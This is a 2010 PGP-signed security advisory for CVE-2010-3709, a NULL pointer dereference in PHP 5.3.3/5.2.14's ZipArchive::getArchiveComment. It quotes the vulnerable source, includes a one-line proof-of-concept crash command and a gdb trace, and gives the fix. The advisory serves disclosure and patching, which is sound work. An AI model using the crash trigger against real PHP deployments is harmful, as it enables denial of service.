PHP 5.3.3 / 5.2.14 ZipArchive::getArchiveComment NULL Pointer Dereference

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference]  
  
Author: Maksymilian Arciemowicz  
http://securityreason.com/  
http://cxib.net/  
Date:  
- - Dis.: 14.09.2010  
- - Pub.: 05.11.2010  
  
CVE: CVE-2010-3709  
CWE: CWE-476  
Status: Fixed in CVS  
  
Affected Software:  
- - PHP 5.3.3  
- - PHP 5.2.14  
  
Original URL:  
http://securityreason.com/achievement_securityalert/90  
  
  
- --- 0.Description ---  
ZipArchive enables you to transparently read or write ZIP compressed  
archives and the files inside them.  
  
ZipArchive::getArchiveComment ? Returns the Zip archive comment  
  
string ZipArchive::getArchiveComment ( void )  
  
  
- --- 1. PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment (CWE-476) ---  
As we can see in  
  
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?revision=303622&view=markup  
  
- ---  
1945 static ZIPARCHIVE_METHOD(getArchiveComment)  
1946 {  
1947 struct zip *intern;  
1948 zval *this = getThis();  
1949 long flags = 0;  
1950 const char * comment;  
1951 int comment_len = 0;  
1952   
1953 if (!this) {  
1954 RETURN_FALSE;  
1955 }  
1956   
1957 ZIP_FROM_OBJECT(intern, this);  
1958   
1959 if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "|l", &flags)  
== FAILURE) {  
1960 return;  
1961 }  
1962   
1963 comment = zip_get_archive_comment(intern, &comment_len,  
(int)flags); <==== RETURN NULL AND -1  
1964 RETURN_STRINGL((char *)comment, (long)comment_len, 1); <===== NULL  
POINTER DEFERENCE HERE  
1965 }  
- ---  
  
this method return string from zip_get_archive_comment() function. Now  
we need see this function,  
  
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_get_archive_comment.c?revision=284361&view=markup  
  
- ---  
40 ZIP_EXTERN(const char *)  
41 zip_get_archive_comment(struct zip *za, int *lenp, int flags)  
42 {  
43 if ((flags & ZIP_FL_UNCHANGED)  
44 || (za->ch_comment_len == -1)) {  
45 if (za->cdir) {  
46 if (lenp != NULL)  
47 *lenp = za->cdir->comment_len;  
48 return za->cdir->comment;  
49 }  
50 else {  
51 if (lenp != NULL)  
52 *lenp = -1; <===================== -1  
53 return NULL; <==================== NULL  
54 }  
55 }  
56   
57 if (lenp != NULL)  
58 *lenp = za->ch_comment_len;  
59 return za->ch_comment;  
60 }  
- ---  
  
  
line 52 and 53 should return NULL pointer and (int)-1. In result  
RETURN_STRINGL() will be executed with:  
  
RETURN_STRINGL(NULL, -1, 1);  
  
and crash in memcpy(3).  
  
  
- --- 2. PoC ---  
  
cx@cx64:/www$ touch empty.zip  
cx@cx64:/www$ php -r '$zip= new  
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'  
Segmentation fault  
  
Debug:  
cx@cx64:/www$ gdb -q php  
Reading symbols from /usr/bin/php...(no debugging symbols found)...done.  
(gdb) r -r '$zip= new  
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'  
Starting program: /usr/bin/php -r '$zip= new  
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'  
[Thread debugging using libthread_db enabled]  
  
Program received signal SIGSEGV, Segmentation fault.  
0x00007ffff530edbb in memcpy () from /lib/libc.so.6  
(gdb) bt  
#0 0x00007ffff530edbb in memcpy () from /lib/libc.so.6  
#1 0x0000000000679fa8 in _estrndup ()  
#2 0x00000000006371e5 in ?? ()  
#3 0x00000000006e793a in ?? ()  
#4 0x00000000006bec20 in execute ()  
#5 0x000000000068b44a in zend_eval_stringl ()  
#6 0x000000000068b5c9 in zend_eval_stringl_ex ()  
#7 0x000000000072743e in ?? ()  
#8 0x00007ffff52a6c4d in __libc_start_main () from /lib/libc.so.6  
#9 0x000000000042c6a9 in _start ()  
(gdb) x/i $rip  
=> 0x7ffff530edbb <memcpy+347>: rep movsq %ds:(%rsi),%es:(%rdi)  
(gdb) x/x $rsi  
0x0: Cannot access memory at address 0x0  
(gdb) x/x $rbp  
0xffffffff: Cannot access memory at address 0xffffffff  
  
  
- --- 3. Fix ---  
Fix:  
Replace  
1963 comment = zip_get_archive_comment(intern, &comment_len, (int)flags);  
1964 RETURN_STRINGL((char *)comment, (long)comment_len, 1);  
  
to  
  
1963 comment = zip_get_archive_comment(intern, &comment_len, (int)flags);  
1964 if(comment==NULL) RETURN_FALSE;  
1965 RETURN_STRINGL((char *)comment, (long)comment_len, 1);  
  
PHP 5.3:  
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log  
  
PHP 5.2:  
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/zip/php_zip.c?view=log  
  
MDVSA-2010:218  
  
  
- --- 4. Greets ---  
Special thanks for Pierre Joye  
  
sp3x, Infospec, Adam Zabrocki 'pi3'  
  
  
- --- 5. Contact ---  
Author: SecurityReason.com [ Maksymilian Arciemowicz ]  
  
Email:  
- - cxib {a\./t] securityreason [d=t} com  
  
GPG:  
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
  
http://securityreason.com/  
http://cxib.net/  
  
- --   
Best Regards  
pub 4096R/D6E5B530 2010-09-19  
uid Maksymilian Arciemowicz (cx) <[email protected]>  
sub 4096R/58BA663C 2010-09-19  
-----BEGIN PGP SIGNATURE-----  
  
iQIcBAEBAgAGBQJM1GvbAAoJEIO8+dzW5bUwSNAQAK6zlkav7055LDi253vq4Urs  
YIXd5u5FIrttRCMMJdANhxqFwYbMk5fUwICsw7i4qsirNg9Cdam2MI38GCi4Um2Z  
so8fBo+NndTTqStM00gmJva/8HlhLw9LyXh05Ii7FcgK3DRwvAYa/1BFvAi7yBhX  
EPOqRWaaeiDvehtjn/SC8enbesHE2hEUDiuNhMwZEDmdbv+EfpOMt/lBcwwdKZcE  
QwXS7ElHyJ0geDB9ynnaAgmZvbnbA7aj0BpCIf+9C+Qu0kdSf4F/t0nDG2BfvvyF  
wB5hT5wPYYIexsqnGPBHy48t38JTZ10mJrLVSnK5My5ODHrU1QqZau/8zMnZU7Uw  
OoA5QawzW4CQX5tUfG0cD+Qd7DA2WX/ui7akw5nSHNL0AIru/IMmdZwXHuqJke6R  
AfQlY3VznE0V7/O9F+y2gkbkAMTdVjddU6N6Z72hJSrzRCxIgqcSFIXOtQIXz6fl  
H4ymSLL0VydYrG6kiw4b6UgAXRhWFEsjrSmpYS61MnWTsx+B55ERjIXoQpiBYTbl  
RRrDvXDCa9r/xpAX/yC2FVz7ECfOePI+gx/FW2dSBBEKe340xsmE/H90iLUWhDhX  
csCYgZWvIe8mAZ3zT3c0ONAoRPWjnLo+QhMZtyZk4vc294C9spdR8uAlGxIVfQf5  
+RibkqlDnn1yRveXjRpO  
=REiM  
-----END PGP SIGNATURE-----  
`